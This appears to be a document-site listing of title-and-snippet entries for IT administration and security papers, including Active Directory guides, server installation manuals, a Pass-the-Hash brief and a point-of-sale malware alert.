PineApp Surf-SeCure Quick PineApp Surf-SeCure Quick Installation Guide September 2010 WEB BASED INSTALLATION SURF-SECURE AS PROXY 1. Once logged in, set the appliance s clock: a. Click on the Edit link under Time-Zone section.

More information

Testing New Applications In The DMZ Using VMware ESX. Ivan Dell Era Software Engineer IBM

Testing New Applications In The DMZ Using VMware ESX. Ivan Dell Era Software Engineer IBM Testing New Applications In The DMZ Using VMware ESX Ivan Dell Era Software Engineer IBM Agenda Problem definition Traditional solution The solution with VMware VI Remote control through the firewall Problem

More information

Eylean server deployment guide

Eylean server deployment guide Eylean server deployment guide Contents 1 Minimum software and hardware requirements... 2 2 Setting up the server using Eylean.Server.Setup.exe wizard... 2 3 Manual setup with Windows authentication -

More information

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction

More information

SECURITY BEST PRACTICES FOR CISCO PERSONAL ASSISTANT (1.4X)

SECURITY BEST PRACTICES FOR CISCO PERSONAL ASSISTANT (1.4X) WHITE PAPER SECURITY BEST PRACTICES FOR CISCO PERSONAL ASSISTANT (1.4X) INTRODUCTION This document covers the recommended best practices for hardening a Cisco Personal Assistant 1.4(x) server. The term

More information

User Guide. Version R91. English

User Guide. Version R91. English AuthAnvil User Guide Version R91 English August 25, 2015 Agreement The purchase and use of all Software and Services is subject to the Agreement as defined in Kaseya s Click-Accept EULATOS as updated from

More information

Alert Notification of Critical Results (ANCR) Public Domain Deployment Instructions

Alert Notification of Critical Results (ANCR) Public Domain Deployment Instructions Alert Notification of Critical Results (ANCR) Public Domain Deployment Instructions Server Prerequisites Internet Information Server (IIS). It may be enabled in Windows Features (see Enabling IIS section).

More information

Securing Active Directory Presented by Michael Ivy

Securing Active Directory Presented by Michael Ivy Securing Active Directory Presented by Michael Ivy Presenter: Michael Ivy Consultant, Rook Security Michael Ivy Thank you for being here today August 20, 2014 Brief Overview Securing NTDS and Replication

More information

4cast Server Specification and Installation

4cast Server Specification and Installation 4cast Server Specification and Installation Version 2015.00 10 November 2014 Innovative Solutions for Education Management www.drakelane.co.uk System requirements Item Minimum Recommended Operating system

More information

Configure the Application Server User Account on the Domain Server

Configure the Application Server User Account on the Domain Server How to Set up Kerberos Summary This guide guide provides the steps required to set up Kerberos Configure the Application Server User Account on the Domain Server The following instructions are based on

More information

Xerox DocuShare Private Cloud Service. Security White Paper

Xerox DocuShare Private Cloud Service. Security White Paper Xerox DocuShare Private Cloud Service Security White Paper Table of Contents Overview 3 Adherence to Proven Security Practices 3 Highly Secure Data Centers 4 Three-Tier Architecture 4 Security Layers Safeguard

More information

RSA Security Analytics

RSA Security Analytics RSA Security Analytics Event Source Log Configuration Guide Microsoft SQL Server Last Modified: Thursday, July 30, 2015 Event Source Product Information: Vendor: Microsoft Event Source: SQL Server Versions:

More information

ExecuTrain Course Outline Configuring & Troubleshooting Windows Server 2008 Active Directory Domain Services MOC 6425C 5 Days

ExecuTrain Course Outline Configuring & Troubleshooting Windows Server 2008 Active Directory Domain Services MOC 6425C 5 Days ExecuTrain Course Outline Configuring & Troubleshooting Windows Server 2008 Active Directory Domain Services MOC 6425C 5 Days Introduction This five-day instructor-led course provides in-depth training

More information

Pass-the-Hash. Solution Brief

Pass-the-Hash. Solution Brief Solution Brief What is Pass-the-Hash? The tools and techniques that hackers use to infiltrate an organization are constantly evolving. Credential theft is a consistent concern as compromised credentials

More information

Charles Firth charles@firthconsulting.com. Managing Macs in a Windows World

Charles Firth charles@firthconsulting.com. Managing Macs in a Windows World Charles Firth charles@firthconsulting.com Managing Macs in a Windows World Prerequisites Familiarity with Windows Active Directory networks Interest in Macintosh OSX integration and support Basic understanding

More information

Password Reset PRO INSTALLATION GUIDE

Password Reset PRO INSTALLATION GUIDE Password Reset PRO INSTALLATION GUIDE This guide covers the new features and settings available in Password Reset PRO. Please read this guide completely to ensure a trouble-free installation. March 2009

More information

Data Breaches and Web Servers: The Giant Sucking Sound

Data Breaches and Web Servers: The Giant Sucking Sound Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant

More information

RSA Security Anatomy of an Attack Lessons learned

RSA Security Anatomy of an Attack Lessons learned RSA Security Anatomy of an Attack Lessons learned Malcolm Dundas Account Executive John Hurley Senior Technology Consultant 1 Agenda Advanced Enterprise/ Threats The RSA Breach A chronology of the attack

More information

Before deploying SiteAudit it is recommended to review the information below. This will ensure efficient installation and operation of SiteAudit.

Before deploying SiteAudit it is recommended to review the information below. This will ensure efficient installation and operation of SiteAudit. SiteAudit Knowledge Base Deployment Check List June 2012 In This Article: Platform Requirements Windows Settings Discovery Configuration Before deploying SiteAudit it is recommended to review the information

More information

Configuring and Troubleshooting Windows 2008 Active Directory Domain Services

Configuring and Troubleshooting Windows 2008 Active Directory Domain Services About this Course Configuring and Troubleshooting Windows This five-day instructor-led course provides in-depth training on implementing, configuring, managing and troubleshooting Active Directory Domain

More information

A Systematic Method to Understand Security Risks in a Retail Environment

A Systematic Method to Understand Security Risks in a Retail Environment A Systematic Method to Understand Security Risks in a Retail Environment Version 1.03 Final Prepared by Michael Howard, Senior Principal Cybersecurity Architect Mark Simos, Cybersecurity Architect Sean

More information

Alert (TA14-212A) Backoff Point-of-Sale Malware

Alert (TA14-212A) Backoff Point-of-Sale Malware Alert (TA14-212A) Backoff Point-of-Sale Malware Original release date: July 31, 2014 Systems Affected Point-of-Sale Systems Overview This advisory was prepared in collaboration with the National Cybersecurity

More information

πωχ Notes on Domino Black Hat Las Vegas 2003 Aldora Louw PricewaterhouseCoopers

πωχ Notes on Domino Black Hat Las Vegas 2003 Aldora Louw PricewaterhouseCoopers Notes on Domino Black Hat Las Vegas 2003 Aldora Louw PricewaterhouseCoopers Lotus Domino is inherently secure...a Misconception!!! Security is Not Automatic!!!! Slide #2 Security Requires Planning Design

More information

Configuring and Troubleshooting Windows Server 2008 Active Directory Domain Services

Configuring and Troubleshooting Windows Server 2008 Active Directory Domain Services Active Directory About this Course This five-day instructor-led course provides in-depth training on implementing, configuring, managing and troubleshooting (AD DS) in and R2 environments. It covers core

More information

Active Directory and Oxford Single Sign-On

Active Directory and Oxford Single Sign-On Active Directory and Oxford Single Sign-On Bridget Lewis ICTST Adrian Parks OUCS 21 st June 2007 1 Aim How to link Active Directory to the Oxford Kerberos Single sign-on (SSO) infrastructure What is Kerberos?

More information

Secret Server Installation Windows Server 2008 R2

Secret Server Installation Windows Server 2008 R2 Table of Contents Introduction... 2 ASP.NET Website... 2 SQL Server Database... 2 Administrative Access... 2 Prerequisites... 2 System Requirements Overview... 2 Additional Recommendations... 3 Beginning

More information

Module 10: Maintaining Active Directory

Module 10: Maintaining Active Directory Module 10: Maintaining Active Directory! Lesson: Backing Up Active Directory Topic: How to Back Up Active Directory! Lesson: Restoring Active Directory Topic: How to Perform a Primary Restore! Lesson:

More information

Going in production Winbind in large AD domains today. Günther Deschner gd@samba.org. (Red Hat / Samba Team)

Going in production Winbind in large AD domains today. Günther Deschner gd@samba.org. (Red Hat / Samba Team) Going in production Winbind in large AD domains today Günther Deschner gd@samba.org (Red Hat / Samba Team) Agenda To go where no one has gone before Winbind scalability Find Domain Controllers Active Directory

More information